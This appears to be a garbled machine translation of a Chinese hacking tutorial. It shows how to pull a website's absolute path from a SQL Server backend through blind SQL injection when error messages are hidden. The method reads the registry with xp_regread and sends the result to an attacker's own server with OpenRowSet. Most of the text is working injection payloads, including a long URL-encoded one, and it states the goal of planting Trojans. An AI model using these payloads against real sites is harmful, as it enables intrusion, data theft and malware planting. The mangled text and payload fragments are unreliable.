By Laokai (Laokai) QQ 35054779
On the machine that shields the error message, get the website absolute path.
In the previous stage, when trying to attack a website, I found that the other party's system has shielded the error message, and the database used is also the database connected to the database. The system is also a full patch to attack the injection is more troublesome. . So I have made a "cross-site SQL injection". .
The idea is as follows, since you don't display the wrong message, can I make you display other places? Let SQL write errors into other places. . .
Since it is a research phase, we'd better inject the website directly, but first query analyzer to analyze this method. .
The first idea:
SQL can connect to the outside database. .
So, first use the query analyzer, log in to my own virtual host database (such permissions are relatively small), then launch a SQL Server locally, and establish a track in the SQL event detector in the SQL event probe locally.
Try sp_addlinkedServer if successful, then the same local database. .
The prompt must be the identity of sysadmin. . failure. .
For a thinking:
As long as your SQL dares to come to order, I will not do the result of the execution, as long as the command can be received. .
So considering a command that is not very high: OpenRowSet comes to the server query. . This command effect is to send a database command to a remote database, take back the result set. . So start the command that is "event tracking" monitoring. .
The first attempt first, or executed Create Table [DBO]. [Laokai] ([Cha8] [Char] (255)) - Create a table. Then write the path to the database. Here I consider, directly generate a cross-library script calculated. It is easy to implement. .
DECLARE @result varchar (255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / CONTROLSet001 / Services / W3SVC / Parameters / Virtual Roots',' / ', @ result output insert into laokai (cha8) values (' SELECT a . * From OpenRowSet ('sqloledb' ',' 'your IP' ';' 'sa' ';' 'password', '' select * from pubs.dbo.authors where au_fname = '' '' @Result '' '' '') as a ');
What is the meaning of this code? That is to write the path information of the website to the database. . Nor is not simple written, write simultaneously to construct a SQL statement, the execution result of this statement is to add such a line of records to the CHA8 field of Laokai's database.
Select a. * From OpenRowSet ('Sqloledb', 'Your IP'; 'SA'; 'Password', 'SELECT * from Pubs.dbo.authors where au_fname =' 'C: / INETPUB, 1' ') As a
Where C: / INETPUB, 1 is the root directory of the registry record, and finally do is:
Declare @ a1 char (255) set @ a1 = (select cha8 from laokai) EXEC (@ a1); - this is equal to execution
Select a. * From OpenRowSet ('Sqloledb', 'Your IP'; 'SA'; 'Password', 'SELECT * from Pubs.dbo.authors where au_fname =' 'C: / INETPUB, 1' ') As a
This statement. . . At the same time, you will display over the event probe.
Select * from pubs.dbo.authors where au_fname = 'c: / inetpub ,, 1'
Where C: / INETPUB is the path to the website. . Commissioning success. .
Now enter the actual phase. . A site shields all error messages. . But we can determine that it is injecting the point A.ASP? ID = 1, what to do?
A.ASP? ID = 1; Create Table [DBO]. [Laokai] ([CHA8] [CHAR] (255)) -
Returns normal, we have established a table called Laokai, there is a field called cha8, then:
a.asp id = 1;? DECLARE @result varchar (255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / CONTROLSet001 / Services / W3SVC / Parameters / Virtual Roots', '/', @ result output insert into laokai (CHA8) VALUES ('SELECT A. * from OpenRowSet (' 'sqloledb', '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '. AU_FNAME = '' '' @Result '' '' ') AS A'); -
error. . The error message is blocked. . How to do? After the study, it is found that some characters inside are, such as numbers, need to be converted into 16-based. . Perhaps there are other places to be transformed. . What should I do?
So I wrote an ASCII transformation of 16-based tools, transform all of the code, and then injected it. . (The download address of the tool http://www.cha8.com/ascii.rar trouble is placed in the disc, don't let them, my server can't stand it), and finally it is to perform the above statement. .
A.asp? id = 1;% 44% 45% 43% 4C% 41% 52% 45% 20% 40% 72% 65% 73% 75% 6C% 74% 20% 76% 61% 72% 63% 68 % 61% 72% 28% 32% 35% 35% 29% 20% 65% 78% 65% 63% 20% 6D% 61% 73% 74% 65% 72% 2E% 64% 62% 6F% 2E% 78 % 70% 5F% 72% 65% 67% 72% 65% 61% 64% 20% 27% 48% 4B% 45% 59% 5F% 4C% 4F% 43% 41% 4C% 5F% 4D% 41% 43 % 48% 49% 4E% 45% 27% 2C% 27% 53% 59% 53% 54% 45% 4D% 5C% 43% 4F% 4E% 54% 52% 4F% 4C% 53% 65% 74% 30 % 30% 31% 5C% 53% 65% 72% 76% 69% 63% 65% 73% 5C% 57% 33% 53% 56% 43% 5C% 50% 61% 72% 61% 6D% 65% 74 % 65% 72% 73% 5C% 56% 69% 72% 74% 75% 61% 6C% 20% 52% 6F% 6F% 74% 73% 27% 2C% 20% 27% 2F% 27% 20% 2C % 40% 72% 65% 73% 75% 6C% 74% 20% 6F% 75% 74% 70% 75% 74% 20% 69% 6E% 73% 65% 72% 74% 20% 69% 6E% 74 % 6F% 20% 6C% 61% 6F% 6B% 61% 69% 20% 28% 63% 68% 61% 38% 29% 20% 76% 61% 6C% 75% 65% 73% 28% 27% 53 % 45% 4C% 45% 43% 54% 20% 61% 2E% 2A% 20% 46% 52% 4F% 4D% 20% 4F% 50% 45% 4E% 52% 4F% 57% 53% 45% 54 % 28% 27% 27% 53% 51% 4C% 4F% 4C% 45% 44% 42% 27% 27% 2C% 27% 27% 3F% 3F% 49% 50% 27% 27% 3B% 27% 27 % 73% 61% 27% 27% 3B% 27% 27% 3F% 3F% 27% 27% 2C% 20% 27% 27% 53% 45% 4C% 45% 43% 54% 20% 2A% 20% 46 % 52% 4F% 4D% 20% 70% 75% 62% 73% 2E% 64% 62% 6F% 2E% 61% 75% 74% 68% 6F% 72% 73% 20% 77% 68% 65% 72 % 65% 20% 61% 75% 5F% 66% 6E% 61% 6D% 65% 3D% 27% 27% 27% 27% 27% 20% 2B% 20% 40% 72% 65% 73% 75% 6C % 74% 20% 2B% 20% 27% 27% 27% 27% 2 7% 27% 27% 29% 41% 53% 20% 61% 27% 29% 3B% 2D% 2D% 20 perform success. . .
A.asp? id = 1; declare @ a1 char (255) set @ a1 = (Select cha8 from laokai) EXEC (@ a1);
The website is displayed or the normal page. . But the event detector on your side will display:
Injection is successful. . Rear, I know the absolute path, how to add Trojans' articles. . It is no longer described here. .
Last explanation: This is just a new type of attack idea, let everyone take the data behind the database in another way. .
'' Select * from pubs.dbo.authors where au_fname = '' '' '' 'section, modified to INSERT to join the database. There should be no problem. . Even if you reserve @resultone. . But this will be wrong there. Leave an exec 'c: / inetpub, 1'
